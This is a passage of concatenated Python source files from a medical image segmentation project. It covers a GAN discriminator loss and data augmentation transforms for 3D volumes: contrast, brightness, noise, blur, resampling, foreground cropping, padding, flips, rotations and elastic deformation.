        # pred_res: (1, 1, 256, 256)
        fake_AB = torch.cat((x, pred_res), 1)
        pred_fake = self.forward(fake_AB.detach())  # detach so that only D's parameters are updated here, not the segmentation network's!
        fake_label = torch.zeros_like(pred_fake, device=self.device)
        loss_D_fake = self.loss(pred_fake, fake_label)

        # Real
        real_AB = torch.cat((x, label), 1)
        pred_real = self.forward(real_AB)
        real_label = torch.ones_like(pred_real, device=self.device)
        loss_D_real = self.loss(pred_real, real_label)

        # Combined loss
        loss_D = (loss_D_fake + loss_D_real) * 0.5
        return loss_D


if __name__ == '__main__':
    t1 = torch.rand(1, 2, 128, 128)
    label = torch.rand(1, 1, 128, 128)
    pred_res = torch.rand(1, 1, 128, 128)
    model = NLayerDiscriminator(input_nc=3)
    # out = model(t1)
    # print(out.shape)
    out_loss = model.get_loss_D(t1, pred_res, label)
    print(out_loss)
    print(out_loss.shape)
```
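For orientation, this is how `get_loss_D` slots into an adversarial training step: the discriminator is updated on detached predictions, then the segmentation network is updated so the discriminator labels its output as real. A minimal sketch; `seg_net` and the optimizer settings are hypothetical stand-ins, only `NLayerDiscriminator` and its losses come from the file above:
```python
import torch
import torch.nn as nn

seg_net = nn.Conv2d(2, 1, kernel_size=3, padding=1)   # hypothetical stand-in for the segmentation network
disc = NLayerDiscriminator(input_nc=3)                # 2 image channels + 1 predicted-mask channel
opt_d = torch.optim.Adam(disc.parameters(), lr=2e-4)
opt_g = torch.optim.Adam(seg_net.parameters(), lr=1e-4)

x = torch.rand(1, 2, 128, 128)
label = torch.rand(1, 1, 128, 128)

# 1) Update D: get_loss_D detaches the prediction internally, so only D learns here.
pred = torch.sigmoid(seg_net(x))
loss_d = disc.get_loss_D(x, pred, label)
opt_d.zero_grad()
loss_d.backward()
opt_d.step()

# 2) Update G: push D's output on the fake pair (x, pred) towards the "real" target.
pred = torch.sigmoid(seg_net(x))
d_out = disc(torch.cat((x, pred), 1))
loss_g = disc.loss(d_out, torch.ones_like(d_out))
opt_g.zero_grad()
loss_g.backward()
opt_g.step()
```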
#### File: medical_seg/transformer/color_transformers.py
```python
import random
import numpy as np
from typing import Tuple, List, Hashable, Callable, Union

from scipy.ndimage import gaussian_filter


class ContrastAugmentationTransform:
    def __init__(self, random_state,
                 contrast_range: Union[Tuple[float, float], Callable[[], float]] = (0.75, 1.25),
                 preserve_range: bool = True,
                 per_channel: bool = True,
                 data_key: str = "data",
                 execution_probability: float = 0.1,
                 p_per_channel: float = 1):
        """
        Augments the contrast of data
        :param contrast_range:
            (float, float): range from which to sample a random contrast that is applied to the data. If
                            one value is smaller and one is larger than 1, half of the contrast modifiers will be >1
                            and the other half <1 (in the interval that was specified)
            callable      : must be contrast_range() -> float
        :param preserve_range: if True then the intensity values after contrast augmentation will be cropped to min and
        max values of the data before augmentation.
        :param per_channel: whether to use the same contrast modifier for all color channels or a separate one for each
        channel
        :param data_key:
        :param execution_probability:
        """
        self.random_state = random_state
        self.execution_probability = execution_probability
        self.data_key = data_key
        self.contrast_range = contrast_range
        self.preserve_range = preserve_range
        self.per_channel = per_channel
        self.p_per_channel = p_per_channel

    def __call__(self, data):
        if self.random_state.uniform() < self.execution_probability:
            data = augment_contrast(self.random_state, data,
                                    contrast_range=self.contrast_range,
                                    preserve_range=self.preserve_range,
                                    per_channel=self.per_channel,
                                    p_per_channel=self.p_per_channel)
        return data


def augment_contrast(random_state, data_sample: np.ndarray,
                     contrast_range: Union[Tuple[float, float], Callable[[], float]] = (0.75, 1.25),
                     preserve_range: bool = True,
                     per_channel: bool = True,
                     p_per_channel: float = 1) -> np.ndarray:
    if not per_channel:
        if callable(contrast_range):
            factor = contrast_range()
        else:
            if random_state.uniform() < 0.5 and contrast_range[0] < 1:
                factor = random_state.uniform(contrast_range[0], 1)
            else:
                factor = random_state.uniform(max(contrast_range[0], 1), contrast_range[1])

        for c in range(data_sample.shape[0]):
            if random_state.uniform() < p_per_channel:
                mn = data_sample[c].mean()
                if preserve_range:
                    minm = data_sample[c].min()
                    maxm = data_sample[c].max()

                data_sample[c] = (data_sample[c] - mn) * factor + mn

                if preserve_range:
                    data_sample[c][data_sample[c] < minm] = minm
                    data_sample[c][data_sample[c] > maxm] = maxm
    else:
        for c in range(data_sample.shape[0]):
            if random_state.uniform() < p_per_channel:
                if callable(contrast_range):
                    factor = contrast_range()
                else:
                    if random_state.uniform() < 0.5 and contrast_range[0] < 1:
                        factor = random_state.uniform(contrast_range[0], 1)
                    else:
                        factor = random_state.uniform(max(contrast_range[0], 1), contrast_range[1])

                mn = data_sample[c].mean()
                if preserve_range:
                    minm = data_sample[c].min()
                    maxm = data_sample[c].max()

                data_sample[c] = (data_sample[c] - mn) * factor + mn

                if preserve_range:
                    data_sample[c][data_sample[c] < minm] = minm
                    data_sample[c][data_sample[c] > maxm] = maxm
    return data_sample


class BrightnessTransform:
    def __init__(self, mu, sigma, per_channel=True, data_key="data", p_per_sample=1, p_per_channel=1):
        """
        Augments the brightness of data. Additive brightness is sampled from Gaussian distribution with mu and sigma
        :param mu: mean of the Gaussian distribution to sample the added brightness from
        :param sigma: standard deviation of the Gaussian distribution to sample the added brightness from
        :param per_channel: whether to use the same brightness modifier for all color channels or a separate one for
        each channel
        :param data_key:
        :param p_per_sample:
        """
        self.p_per_sample = p_per_sample
        self.data_key = data_key
        self.mu = mu
        self.sigma = sigma
        self.per_channel = per_channel
        self.p_per_channel = p_per_channel

    def __call__(self, **data_dict):
        data = data_dict[self.data_key]
        for b in range(data.shape[0]):
            if np.random.uniform() < self.p_per_sample:
                data[b] = augment_brightness_additive(data[b], self.mu, self.sigma, self.per_channel,
                                                      p_per_channel=self.p_per_channel)
        data_dict[self.data_key] = data
        return data_dict


def augment_brightness_additive(data_sample, mu: float, sigma: float, per_channel: bool = True, p_per_channel: float = 1.):
    """
    data_sample must have shape (c, x, y(, z)))
    :param data_sample:
    :param mu:
    :param sigma:
    :param per_channel:
    :param p_per_channel:
    :return:
    """
    if not per_channel:
        rnd_nb = np.random.normal(mu, sigma)
        for c in range(data_sample.shape[0]):
            if np.random.uniform() <= p_per_channel:
                data_sample[c] += rnd_nb
    else:
        for c in range(data_sample.shape[0]):
            if np.random.uniform() <= p_per_channel:
                rnd_nb = np.random.normal(mu, sigma)
                data_sample[c] += rnd_nb
    return data_sample


class BrightnessMultiplicativeTransform:
    def __init__(self, random_state, multiplier_range=(0.75, 1.25), per_channel=True, data_key="data", execution_probability=1):
        """
        Augments the brightness of data.
Multiplicative brightness is sampled from multiplier_range :param multiplier_range: range to uniformly sample the brightness modifier from :param per_channel: whether to use the same brightness modifier for all color channels or a separate one for each channel :param data_key: :param p_per_sample: """ self.random_state = random_state self.data_key = data_key self.multiplier_range = multiplier_range self.per_channel = per_channel self.execution_probability = execution_probability def __call__(self, data): if self.random_state.uniform() < self.execution_probability: data = augment_brightness_multiplicative(self.random_state, data, self.multiplier_range, self.per_channel) return data def augment_brightness_multiplicative(random_state, data_sample, multiplier_range=(0.5, 2), per_channel=True): multiplier = random_state.uniform(multiplier_range[0], multiplier_range[1]) if not per_channel: data_sample *= multiplier else: for c in range(data_sample.shape[0]): multiplier = random_state.uniform(multiplier_range[0], multiplier_range[1]) data_sample[c] *= multiplier return data_sample ``` #### File: medical_seg/transformer/noisy_transformers.py ```python import random import numpy as np from typing import Tuple, List, Hashable from scipy.ndimage import gaussian_filter class GaussianNoiseTransform: def __init__(self, random_state, noise_variance=(0, 0.1), p_per_channel: float = 1, per_channel: bool = False, data_key="data", execution_probability=0.2): """ Adds additive Gaussian Noise :param noise_variance: variance is uniformly sampled from that range :param p_per_sample: :param p_per_channel: :param per_channel: if True, each channel will get its own variance sampled from noise_variance :param data_key: CAREFUL: This transform will modify the value range of your data! 
""" self.random_state = random_state self.data_key = data_key self.noise_variance = noise_variance self.p_per_channel = p_per_channel self.per_channel = per_channel self.execution_probability = execution_probability def __call__(self, data): if self.random_state.uniform() < self.execution_probability: data = augment_gaussian_noise(self.random_state, data, self.noise_variance, self.p_per_channel, self.per_channel) return data def augment_gaussian_noise(random_state, data_sample: np.ndarray, noise_variance: Tuple[float, float] = (0, 0.1), p_per_channel: float = 1, per_channel: bool = False) -> np.ndarray: if not per_channel: variance = noise_variance[0] if noise_variance[0] == noise_variance[1] else \ random.uniform(noise_variance[0], noise_variance[1]) else: variance = None for c in range(data_sample.shape[0]): if random_state.uniform() < p_per_channel: # lol good luck reading this variance_here = variance if variance is not None else \ noise_variance[0] if noise_variance[0] == noise_variance[1] else \ random.uniform(noise_variance[0], noise_variance[1]) # bug fixed: https://github.com/MIC-DKFZ/batchgenerators/issues/86 data_sample[c] = data_sample[c] + np.random.normal(0.0, variance_here, size=data_sample[c].shape) return data_sample def augment_gaussian_blur(random_state, data_sample: np.ndarray, sigma_range: Tuple[float, float], per_channel: bool = True, p_per_channel: float = 1, different_sigma_per_axis: bool = False, p_isotropic: float = 0) -> np.ndarray: if not per_channel: # Godzilla Had a Stroke Trying to Read This and F***ing Died # https://i.kym-cdn.com/entries/icons/original/000/034/623/Untitled-3.png sigma = get_range_val(sigma_range) if ((not different_sigma_per_axis) or ((np.random.uniform() < p_isotropic) and different_sigma_per_axis)) \ else [get_range_val(sigma_range) for _ in data_sample.shape[1:]] else: sigma = None for c in range(data_sample.shape[0]): if random_state.uniform() <= p_per_channel: if per_channel: sigma = get_range_val(sigma_range) if ((not different_sigma_per_axis) or ((np.random.uniform() < p_isotropic) and different_sigma_per_axis)) \ else [get_range_val(sigma_range) for _ in data_sample.shape[1:]] data_sample[c] = gaussian_filter(data_sample[c], sigma, order=0) return data_sample class GaussianBlurTransform: def __init__(self, random_state, blur_sigma: Tuple[float, float] = (1, 5), different_sigma_per_channel: bool = True, different_sigma_per_axis: bool = False, p_isotropic: float = 0, p_per_channel: float = 0.5, data_key: str = "data", execution_probability=0.2): """ :param blur_sigma: :param data_key: :param different_sigma_per_axis: if True, anisotropic kernels are possible :param p_isotropic: only applies if different_sigma_per_axis=True, p_isotropic is the proportion of isotropic kernels, the rest gets random sigma per axis :param different_sigma_per_channel: whether to sample a sigma for each channel or all channels at once :param p_per_channel: probability of applying gaussian blur for each channel. 
Default = 1 (all channels are blurred with prob 1) """ self.random_state = random_state self.different_sigma_per_channel = different_sigma_per_channel self.p_per_channel = p_per_channel self.data_key = data_key self.blur_sigma = blur_sigma self.different_sigma_per_axis = different_sigma_per_axis self.p_isotropic = p_isotropic self.execution_probability = execution_probability def __call__(self, data): if self.random_state.uniform() < self.execution_probability: data = augment_gaussian_blur(self.random_state, data, self.blur_sigma, self.different_sigma_per_channel, self.p_per_channel, different_sigma_per_axis=self.different_sigma_per_axis, p_isotropic=self.p_isotropic) return data def get_range_val(value, rnd_type="uniform"): if isinstance(value, (list, tuple, np.ndarray)): if len(value) == 2: if value[0] == value[1]: n_val = value[0] else: orig_type = type(value[0]) if rnd_type == "uniform": n_val = random.uniform(value[0], value[1]) elif rnd_type == "normal": n_val = random.normalvariate(value[0], value[1]) n_val = orig_type(n_val) elif len(value) == 1: n_val = value[0] else: raise RuntimeError("value must be either a single value or a list/tuple of len 2") return n_val else: return value ``` #### File: medical_seg/transformer/transforms.py ```python from functools import total_ordering from operator import is_ import numpy as np from typing import Callable, Iterable, List, Optional, Sequence, Tuple, Union from numpy import random from scipy.ndimage import rotate, map_coordinates, gaussian_filter import h5py from itertools import chain from batchgenerators.augmentations.utils import resize_segmentation import matplotlib.pyplot as plt import torch from .utils import generate_pos_neg_label_crop_centers, \ create_zero_centered_coordinate_mesh, \ elastic_deform_coordinates, \ interpolate_img, scale_coords,\ augment_gamma, augment_mirroring, is_positive, generate_spatial_bounding_box,\ Pad from medical_seg.utils import resample_image_array_size from .utils import resample_data_or_seg RESAMPLING_SEPARATE_Z_ANISO_THRESHOLD = 3 def get_do_separate_z(spacing, anisotropy_threshold=RESAMPLING_SEPARATE_Z_ANISO_THRESHOLD): do_separate_z = (np.max(spacing) / np.min(spacing)) > anisotropy_threshold return do_separate_z def get_lowres_axis(new_spacing): axis = np.where(max(new_spacing) / np.array(new_spacing) == 1)[0] # find which axis is anisotropic return axis def resample_patient(data, seg, original_spacing, target_spacing, order_data=3, order_seg=0, force_separate_z=False, order_z_data=0, order_z_seg=0, separate_z_anisotropy_threshold=RESAMPLING_SEPARATE_Z_ANISO_THRESHOLD): """ :param data: :param seg: :param original_spacing: :param target_spacing: :param order_data: :param order_seg: :param force_separate_z: if None then we dynamically decide how to resample along z, if True/False then always /never resample along z separately :param order_z_seg: only applies if do_separate_z is True :param order_z_data: only applies if do_separate_z is True :param separate_z_anisotropy_threshold: if max_spacing > separate_z_anisotropy_threshold * min_spacing (per axis) then resample along lowres axis with order_z_data/order_z_seg instead of order_data/order_seg :return: """ assert not ((data is None) and (seg is None)) if data is not None: assert len(data.shape) == 4, "data must be c x y z" if seg is not None: if len(seg.shape) == 3: seg = np.expand_dims(seg, axis=0) assert len(seg.shape) == 4, "seg must be c x y z" if data is not None: shape = np.array(data[0].shape) else: shape = np.array(seg[0].shape) new_shape 
= np.round(((np.array(original_spacing) / np.array(target_spacing)).astype(float) * shape)).astype(int)

    if force_separate_z is not None:
        do_separate_z = force_separate_z
        if force_separate_z:
            axis = get_lowres_axis(original_spacing)
        else:
            axis = None
    else:
        if get_do_separate_z(original_spacing, separate_z_anisotropy_threshold):
            do_separate_z = True
            axis = get_lowres_axis(original_spacing)
        elif get_do_separate_z(target_spacing, separate_z_anisotropy_threshold):
            do_separate_z = True
            axis = get_lowres_axis(target_spacing)
        else:
            do_separate_z = False
            axis = None

    if axis is not None:
        if len(axis) == 3:
            # every axis has the spacing, this should never happen, why is this code here?
            do_separate_z = False
        elif len(axis) == 2:
            # this happens for spacings like (0.24, 1.25, 1.25) for example. In that case we do not want to resample
            # separately in the out of plane axis
            do_separate_z = False
        else:
            pass

    if data is not None:
        data_reshaped = resample_data_or_seg(data, new_shape, False, axis, order_data, do_separate_z, order_z=order_z_data)
    else:
        data_reshaped = None
    if seg is not None:
        seg_reshaped = resample_data_or_seg(seg, new_shape, True, axis, order_seg, do_separate_z, order_z=order_z_seg)
    else:
        seg_reshaped = None

    if len(seg_reshaped.shape) == 4:
        seg_reshaped = np.squeeze(seg_reshaped, axis=0)

    return data_reshaped, seg_reshaped


class ResampleImage:
    def __init__(self, resample_size, order=[3, 0]) -> None:
        self.rsize = resample_size
        self.order = order

    def __call__(self, image, label=None):
        if len(image.shape) == 3:
            image = np.expand_dims(image, axis=0)
        c = image.shape[0]
        image = resample_image_array_size(image, out_size=(c,) + self.rsize, order=self.order[0])
        if label is not None:
            label = resample_image_array_size(label, out_size=self.rsize, order=self.order[1])
        return image, label


class CropForegroundImageLabel:
    def __init__(self,
                 select_fn: Callable = is_positive,
                 channel_indices = None,
                 margin = 0,
                 # one padding mode per array: mode[0] for the image, mode[1] for the label;
                 # the old single-entry default would raise an IndexError when a label is passed.
                 mode = ["constant", "constant"]
                 ):
        self.cropper = CropForeground(
            select_fn=select_fn,
            channel_indices=channel_indices,
            margin=margin
        )
        self.mode = mode

    def __call__(self, image, label=None):
        if len(image.shape) == 3:
            image = np.expand_dims(image, axis=0)

        box_start, box_end = self.cropper.compute_bounding_box(image)
        # print(box_start, box_end)  # debug output
        # d[self.start_coord_key] = box_start
        # d[self.end_coord_key] = box_end
        # for key, m in self.key_iterator(d, self.mode):
        #     self.push_transform(d, key, extra_info={"box_start": box_start, "box_end": box_end})
        image = self.cropper.crop_pad(img=image, box_start=box_start, box_end=box_end, mode=self.mode[0])

        if label is not None:
            if len(label.shape) == 3:
                label = np.expand_dims(label, axis=0)
            label = self.cropper.crop_pad(img=label, box_start=box_start, box_end=box_end, mode=self.mode[1])
            if len(label.shape) == 4:
                label = np.squeeze(label, axis=0)

        return image, label


class CropForeground():
    """
    Crop an image using a bounding box. The bounding box is generated by selecting foreground using select_fn
    at channels channel_indices. margin is added in each spatial dimension of the bounding box.
    The typical usage is to help training and evaluation if the valid part is small in the whole medical image.
    Users can define arbitrary function to select expected foreground from the whole image or specified channels.
    And it can also add margin to every dim of the bounding box of foreground object.
    For example:

    ..
code-block:: python image = np.array( [[[0, 0, 0, 0, 0], [0, 1, 2, 1, 0], [0, 1, 3, 2, 0], [0, 1, 2, 1, 0], [0, 0, 0, 0, 0]]]) # 1x5x5, single channel 5x5 image def threshold_at_one(x): # threshold at 1 return x > 1 cropper = CropForeground(select_fn=threshold_at_one, margin=0) print(cropper(image)) [[[2, 1], [3, 2], [2, 1]]] """ def __init__( self, select_fn: Callable = is_positive, channel_indices = None, margin: Union[Sequence[int], int] = 0, return_coords: bool = False, mode: str = "constant", **np_kwargs, ) -> None: """ Args: select_fn: function to select expected foreground, default is to select values > 0. channel_indices: if defined, select foreground only on the specified channels of image. if None, select foreground on the whole image. margin: add margin value to spatial dims of the bounding box, if only 1 value provided, use it for all dims. return_coords: whether return the coordinates of spatial bounding box for foreground. k_divisible: make each spatial dimension to be divisible by k, default to 1. if `k_divisible` is an int, the same `k` be applied to all the input spatial dimensions. mode: available modes for numpy array:{``"constant"``, ``"edge"``, ``"linear_ramp"``, ``"maximum"``, ``"mean"``, ``"median"``, ``"minimum"``, ``"reflect"``, ``"symmetric"``, ``"wrap"``, ``"empty"``} available modes for PyTorch Tensor: {``"constant"``, ``"reflect"``, ``"replicate"``, ``"circular"``}. One of the listed string values or a user supplied function. Defaults to ``"constant"``. See also: https://numpy.org/doc/1.18/reference/generated/numpy.pad.html https://pytorch.org/docs/stable/generated/torch.nn.functional.pad.html np_kwargs: other args for `np.pad` API, note that `np.pad` treats channel dimension as the first dimension. more details: https://numpy.org/doc/1.18/reference/generated/numpy.pad.html """ self.select_fn = select_fn self.channel_indices = channel_indices self.margin = margin self.return_coords = return_coords self.mode = mode self.np_kwargs = np_kwargs def compute_bounding_box(self, img): """ Compute the start points and end points of bounding box to crop. And adjust bounding box coords to be divisible by `k`. """ box_start, box_end = generate_spatial_bounding_box(img, self.select_fn, self.channel_indices, self.margin) # box_start_, *_ = convert_data_type(box_start, output_type=np.ndarray, dtype=np.int16, wrap_sequence=True) # box_end_, *_ = convert_data_type(box_end, output_type=np.ndarray, dtype=np.int16, wrap_sequence=True) # print(box_start) # print(box_end) box_start = np.array(box_start) box_end = np.array(box_end) orig_spatial_size = box_end - box_start # make the spatial size divisible by `k` spatial_size = np.array(orig_spatial_size) # spatial_size = np.asarray(compute_divisible_spatial_size(orig_spatial_size.tolist(), k=self.k_divisible)) # update box_start and box_end box_start_ = box_start - np.floor_divide(np.asarray(spatial_size) - orig_spatial_size, 2) box_end_ = box_start + spatial_size return box_start_, box_end_ def crop_pad( self, img, box_start: np.ndarray, box_end: np.ndarray, mode = None, ): """ Crop and pad based on the bounding box. 
""" cropped = SpatialCrop(roi_start=box_start, roi_end=box_end)(img) pad_to_start = np.maximum(-box_start, 0) pad_to_end = np.maximum(box_end - np.asarray(img.shape[1:]), 0) pad = list(chain(*zip(pad_to_start.tolist(), pad_to_end.tolist()))) return BorderPad(spatial_border=pad, mode=mode or self.mode, **self.np_kwargs)(cropped) def __call__(self, img, mode = None): """ Apply the transform to `img`, assuming `img` is channel-first and slicing doesn't change the channel dim. """ box_start, box_end = self.compute_bounding_box(img) cropped = self.crop_pad(img, box_start, box_end, mode) if self.return_coords: return cropped, box_start, box_end return cropped class Random: def __init__(self, seed) -> None: self.seed = seed self.R = np.random.RandomState(seed) def do_transform(self, prob): ## 随机一个概率,当这个概率小于prob的时候,便去进行变换。 prob = min(max(prob, 0.0), 1.0) return self.R.rand() < prob class BorderPad: """ Pad the input data by adding specified borders to every dimension. Args: spatial_border: specified size for every spatial border. Any -ve values will be set to 0. It can be 3 shapes: - single int number, pad all the borders with the same size. - length equals the length of image shape, pad every spatial dimension separately. for example, image shape(CHW) is [1, 4, 4], spatial_border is [2, 1], pad every border of H dim with 2, pad every border of W dim with 1, result shape is [1, 8, 6]. - length equals 2 x (length of image shape), pad every border of every dimension separately. for example, image shape(CHW) is [1, 4, 4], spatial_border is [1, 2, 3, 4], pad top of H dim with 1, pad bottom of H dim with 2, pad left of W dim with 3, pad right of W dim with 4. the result shape is [1, 7, 11]. mode: available modes for numpy array:{``"constant"``, ``"edge"``, ``"linear_ramp"``, ``"maximum"``, ``"mean"``, ``"median"``, ``"minimum"``, ``"reflect"``, ``"symmetric"``, ``"wrap"``, ``"empty"``} available modes for PyTorch Tensor: {``"constant"``, ``"reflect"``, ``"replicate"``, ``"circular"``}. One of the listed string values or a user supplied function. Defaults to ``"constant"``. See also: https://numpy.org/doc/1.18/reference/generated/numpy.pad.html https://pytorch.org/docs/stable/generated/torch.nn.functional.pad.html kwargs: other arguments for the `np.pad` or `torch.pad` function. note that `np.pad` treats channel dimension as the first dimension. """ def __init__( self, spatial_border: Union[Sequence[int], int], mode = "constant", **kwargs, ) -> None: self.spatial_border = spatial_border self.mode = mode self.kwargs = kwargs def __call__( self, img, mode = None ): """ Args: img: data to be transformed, assuming `img` is channel-first and padding doesn't apply to the channel dim. mode: available modes for numpy array:{``"constant"``, ``"edge"``, ``"linear_ramp"``, ``"maximum"``, ``"mean"``, ``"median"``, ``"minimum"``, ``"reflect"``, ``"symmetric"``, ``"wrap"``, ``"empty"``} available modes for PyTorch Tensor: {``"constant"``, ``"reflect"``, ``"replicate"``, ``"circular"``}. One of the listed string values or a user supplied function. Defaults to `self.mode`. See also: https://numpy.org/doc/1.18/reference/generated/numpy.pad.html https://pytorch.org/docs/stable/generated/torch.nn.functional.pad.html Raises: ValueError: When ``self.spatial_border`` does not contain ints. ValueError: When ``self.spatial_border`` length is not one of [1, len(spatial_shape), 2*len(spatial_shape)]. 
""" spatial_shape = img.shape[1:] spatial_border = self.spatial_border if not all(isinstance(b, int) for b in spatial_border): raise ValueError(f"self.spatial_border must contain only ints, got {spatial_border}.") spatial_border = tuple(max(0, b) for b in spatial_border) if len(spatial_border) == 1: data_pad_width = [(spatial_border[0], spatial_border[0]) for _ in spatial_shape] elif len(spatial_border) == len(spatial_shape): data_pad_width = [(sp, sp) for sp in spatial_border[: len(spatial_shape)]] elif len(spatial_border) == len(spatial_shape) * 2: data_pad_width = [(spatial_border[2 * i], spatial_border[2 * i + 1]) for i in range(len(spatial_shape))] else: raise ValueError( f"Unsupported spatial_border length: {len(spatial_border)}, available options are " f"[1, len(spatial_shape)={len(spatial_shape)}, 2*len(spatial_shape)={2*len(spatial_shape)}]." ) all_pad_width = [(0, 0)] + data_pad_width padder = Pad(all_pad_width, mode or self.mode, **self.kwargs) return padder(img) def map_spatial_axes( img_ndim: int, spatial_axes=None, channel_first=True, ) -> List[int]: """ Utility to map the spatial axes to real axes in channel first/last shape. For example: If `channel_first` is True, and `img` has 3 spatial dims, map spatial axes to real axes as below: None -> [1, 2, 3] [0, 1] -> [1, 2] [0, -1] -> [1, -1] If `channel_first` is False, and `img` has 3 spatial dims, map spatial axes to real axes as below: None -> [0, 1, 2] [0, 1] -> [0, 1] [0, -1] -> [0, -2] Args: img_ndim: dimension number of the target image. spatial_axes: spatial axes to be converted, default is None. The default `None` will convert to all the spatial axes of the image. If axis is negative it counts from the last to the first axis. If axis is a tuple of ints. channel_first: the image data is channel first or channel last, default to channel first. """ if spatial_axes is None: spatial_axes_ = list(range(1, img_ndim) if channel_first else range(img_ndim - 1)) else: spatial_axes_ = [] for a in spatial_axes: if channel_first: spatial_axes_.append(a if a < 0 else a + 1) else: spatial_axes_.append(a - 1 if a < 0 else a) return spatial_axes_ class RandomFlip(): """ Reverses the order of elements along the given spatial axis. Preserves shape. Uses ``np.flip`` in practice. See numpy.flip for additional details: https://docs.scipy.org/doc/numpy/reference/generated/numpy.flip.html. Args: spatial_axis: spatial axes along which to flip over. Default is None. The default `axis=None` will flip over all of the axes of the input array. If axis is negative it counts from the last to the first axis. If axis is a tuple of ints, flipping is performed on all of the axes specified in the tuple. 
""" def __init__(self, random_state, spatial_axis = None, execution_probability=0.2): self.spatial_axis = spatial_axis self.random_state = random_state self.execution_probability = execution_probability def __call__(self, img: np.ndarray, label: np.ndarray = None) -> np.ndarray: """ Args: img: channel first array, must have shape: (num_channels, H[, W, ..., ]), """ if self.random_state.uniform() > self.execution_probability: ## 不去做变换 return img, label result: np.ndarray = np.flip(img, map_spatial_axes(img.ndim, self.spatial_axis)) if label is not None : if len(label.shape) == 3: # 说明通道维度没有 label = np.expand_dims(label, axis=0) label = np.flip(label, map_spatial_axes(label.ndim, self.spatial_axis)) label = np.squeeze(label, axis=0) elif len(label.shape) == 4: label = np.flip(label, map_spatial_axes(label.ndim, self.spatial_axis)) else : raise "label shape err" return result.astype(img.dtype), label.astype(label.dtype) return result.astype(img.dtype) class RandomRotate90: def __init__(self, random_state, execution_probability=0.2): self.random_state = random_state self.axis = (1, 2) self.execution_probability = execution_probability def __call__(self, m, label=None): assert m.ndim in [3, 4], 'Supports only 3D (DxHxW) or 4D (CxDxHxW) images' k = self.random_state.randint(0, 4) # rotate k times around a given plane assert m.ndim == 4, "输入必须为3d图像,第一个维度为channel" if self.random_state.uniform() < self.execution_probability: channels = [np.rot90(m[c], k, self.axis) for c in range(m.shape[0])] m = np.stack(channels, axis=0) if label is not None : assert label.ndim == 3, "label shape 必须为三维" label = np.rot90(label, k, self.axis) return m, label class RandomRotate: """ Rotate an array by a random degrees from taken from (-angle_spectrum, angle_spectrum) interval. Rotation axis is picked at random from the list of provided axes. 
""" def __init__(self, random_state, angle_spectrum=30, axes=None, mode='reflect', order=0, execution_probability=0.2): if axes is None: axes = [[2, 1]] # 这样就是以后两个维度为平面进行旋转。 第一个维度是深度 self.random_state = random_state self.angle_spectrum = angle_spectrum self.axes = axes self.execution_probability = execution_probability self.mode = mode self.order = order def __call__(self, m, label=None): if self.random_state.uniform() < self.execution_probability: axis = self.axes[self.random_state.randint(len(self.axes))] angle = self.random_state.randint(-self.angle_spectrum, self.angle_spectrum) assert m.ndim == 4, "输入必须为3d图像,第一个维度为channel" channels = [rotate(m[c], angle, axes=axis, reshape=False, order=self.order, mode=self.mode, cval=-1) for c in range(m.shape[0])] m = np.stack(channels, axis=0) if label is not None : assert label.ndim == 3, "label shape 必须为三维" label = rotate(label, angle, axes=axis, reshape=False, order=self.order, mode="nearest", cval=-1) return m, label class Elatic: def __init__(self, random_state, alpha=(0., 900.), sigma=(9., 13.), scale=(0.85, 1.25), order_seg=1, order_data=3, border_mode_seg="constant", border_cval_seg=0, execution_probability=0.2) -> None: self.random_state = random_state self.alpha = alpha self.sigma = sigma self.scale = scale self.order_seg = order_seg self.order_data = order_data self.border_mode_seg = border_mode_seg self.border_cval_seg = border_cval_seg self.execution_probability = execution_probability def _do_elastic(self, m, seg=None): a = self.random_state.uniform(self.alpha[0], self.alpha[1]) s = self.random_state.uniform(self.sigma[0], self.sigma[1]) patch_size = m.shape[1:] coords = create_zero_centered_coordinate_mesh(patch_size) coords = elastic_deform_coordinates(coords, a, s, self.random_state) dim = 3 seg_result = None if seg is not None: seg_result = np.zeros((patch_size[0], patch_size[1], patch_size[2]), dtype=np.float32) data_result = np.zeros((m.shape[0], patch_size[0], patch_size[1], patch_size[2]), dtype=np.float32) for d in range(dim): ctr = m.shape[d + 1] / 2. - 0.5 coords[d] += ctr if self.scale[0] < 1: sc = self.random_state.uniform(self.scale[0], 1) else : sc = self.random_state.uniform(max(self.scale[0], 1), self.scale[1]) coords = scale_coords(coords, sc) for channel_id in range(m.shape[0]): data_result[channel_id] = interpolate_img(m[channel_id], coords, self.order_data, cval=0.0, is_seg=False) if seg is not None: seg_result = interpolate_img(seg, coords, self.order_seg, self.border_mode_seg, cval=self.border_cval_seg, is_seg=True) return data_result, seg_result def __call__(self, m, seg=None): assert len(m.shape) == 4, "image dim 必须为4" if self.random_state.uniform() < self.execution_probability: m, seg = self._do_elastic(m, seg=seg) if seg is not None : return m, seg else : return m class Standardize: """ Apply Z-score normalization to a given input tensor, i.e. re-scaling the values to be 0-mean and 1-std. Mean and std parameter have to be provided explicitly. 
""" def __init__(self, a_min, a_max, b_min=0, b_max=1, eps=1e-6, clip=True): self.a_min = a_min self.a_max = a_max self.b_min = b_min self.b_max = b_max self.eps = eps self.clip = clip def __call__(self, m): img = (m - self.a_min) / (self.a_max - self.a_min) if self.clip: img = np.clip(img, self.b_min, self.b_max) return img class Normalization(): def __init__(self, channel_wise=False): pass self.channel_wise = channel_wise def __call__(self, m): assert len(m.shape) == 4, "image shape err" if not self.channel_wise: m = (m - m.mean()) / m.std() else : for i, d in enumerate(m): slices = d != 0 _sub = d[slices].mean() _div = d[slices].std() m[i][slices] = (m[i][slices] - _sub) / (_div+1e-8) return m class AdditiveGaussianNoise: def __init__(self, random_state, scale=(0.0, 0.2), execution_probability=0.2): self.execution_probability = execution_probability self.random_state = random_state self.scale = scale def __call__(self, m): if self.random_state.uniform() < self.execution_probability: std = self.random_state.uniform(self.scale[0], self.scale[1]) gaussian_noise = self.random_state.normal(0, std, size=m.shape) return m + gaussian_noise return m class AdditivePoissonNoise: def __init__(self, random_state, lam=(0.0, 0.2), execution_probability=0.2): self.execution_probability = execution_probability self.random_state = random_state self.lam = lam def __call__(self, m): if self.random_state.rand() < self.execution_probability: lam = self.random_state.uniform(self.lam[0], self.lam[1]) poisson_noise = self.random_state.poisson(lam, size=m.shape) return m + poisson_noise return m class SpatialCrop: """ General purpose cropper to produce sub-volume region of interest (ROI). If a dimension of the expected ROI size is bigger than the input image size, will not crop that dimension. So the cropped result may be smaller than the expected ROI, and the cropped results of several images may not have exactly the same shape. It can support to crop ND spatial (channel-first) data. The cropped region can be parameterised in various ways: - a list of slices for each spatial dimension (allows for use of -ve indexing and `None`) - a spatial center and size - the start and end coordinates of the ROI """ def __init__( self, roi_center: Union[Sequence[int], np.ndarray, None] = None, 